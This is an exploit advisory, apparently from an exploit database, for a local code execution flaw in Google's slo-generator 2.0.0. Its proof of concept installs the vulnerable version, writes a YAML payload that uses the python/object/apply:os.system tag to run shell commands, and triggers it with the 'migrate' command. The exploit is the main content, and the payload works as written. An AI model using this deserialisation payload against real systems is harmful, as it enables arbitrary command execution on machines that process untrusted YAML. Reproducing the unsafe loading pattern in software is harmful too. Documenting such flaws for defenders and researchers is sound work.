Google slogenerator 2.0.0 code execution Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-10-07 |
Type : local |
Platform : linux
This exploit / vulnerability Google slogenerator 2.0.0 code execution is for educational purposes only and if it is used you will do on your own risk!
*Introduction*:
Is a tool to compute and export Service Level Objectives (SLOs), Error
Budgets and Burn Rates, using configurations written in YAML (or JSON)
format.
*POC:*
1. pip3 install slo-generator==2.0.0
2. 2. Save the below yaml code in a file as exploit.yaml.
!!python/object/apply:os.system ["id;whoami"]
3. Run the below command
slo-generator migrate -b exploit.yaml
##############################################################################